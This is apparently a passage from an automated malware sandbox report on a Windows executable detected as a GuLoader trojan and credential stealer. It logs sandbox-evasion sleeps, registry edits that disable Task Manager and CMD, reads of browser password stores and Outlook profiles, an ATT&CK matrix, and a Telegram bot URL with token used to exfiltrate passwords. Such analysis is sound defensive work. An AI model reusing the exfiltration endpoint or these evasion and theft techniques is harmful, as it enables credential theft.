            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 3668Thread sleep count: 1638 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 3668Thread sleep count: 8204 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599435s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598848s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598633s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -597093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596977s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596304s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596197s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -596075s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595967s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595627s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595278s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exe TID: 4684Thread sleep time: -594187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598848Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598633Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596977Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596304Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596197Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 596075Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595627Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595278Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeThread delayed: delay time: 594187Jump to behavior
            Source: 4UQ5wnI389.exe, 00000005.00000002.2722332794.00000000046D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh&s
            Source: 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000472F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeAPI call chain: ExitProcess graph end nodegraph_0-4589
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_70141B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70141B5F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeProcess created: C:\Users\user\Desktop\4UQ5wnI389.exe "C:\Users\user\Desktop\4UQ5wnI389.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Users\user\Desktop\4UQ5wnI389.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4UQ5wnI389.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4UQ5wnI389.exe PID: 5624, type: MEMORYSTR
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4UQ5wnI389.exe PID: 5624, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4UQ5wnI389.exe PID: 5624, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4UQ5wnI389.exe PID: 5624, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            4UQ5wnI389.exe75%VirustotalBrowse
            4UQ5wnI389.exe58%ReversingLabsWin32.Trojan.GuLoader
            4UQ5wnI389.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.78
            truefalse
              high
              drive.usercontent.google.com
              216.58.206.33
              truefalse
                high
                reallyfreegeoip.org
                104.21.112.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.com4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://translate.google.com/translate_a/element.js4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/w4UQ5wnI389.exe, 00000005.00000002.2722332794.00000000046D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/4UQ5wnI389.exe, 00000005.00000002.2722332794.00000000046D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.org4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=19344UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/4UQ5wnI389.exe, 00000005.00000003.2059854655.0000000004745000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2059745395.000000000473F000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2031235862.0000000004748000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000473E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.org4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D24000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.com4UQ5wnI389.exe, 00000005.00000003.2024010382.0000000004748000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.com4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorError4UQ5wnI389.exefalse
                                                          high
                                                          http://api.telegram.org4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034F16000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000035038000.00000004.00000800.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/74UQ5wnI389.exe, 00000005.00000003.2059854655.0000000004745000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2059745395.000000000473F000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000003.2031235862.0000000004748000.00000004.00000020.00020000.00000000.sdmp, 4UQ5wnI389.exe, 00000005.00000002.2722332794.000000000473E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/4UQ5wnI389.exe, 00000005.00000002.2743712849.0000000034D2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.186.78
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  104.21.112.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  216.58.206.33
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  158.101.44.242
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588102
                                                                  Start date and time:2025-01-10 21:23:10 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 43s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:4UQ5wnI389.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:280344d8a94a23a0e351b1c1553ed3f1ae6db9c06c75ecda292211f5562de552.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 164
                                                                  • Number of non-executed functions: 108
                                                                  Cookbook Comments:
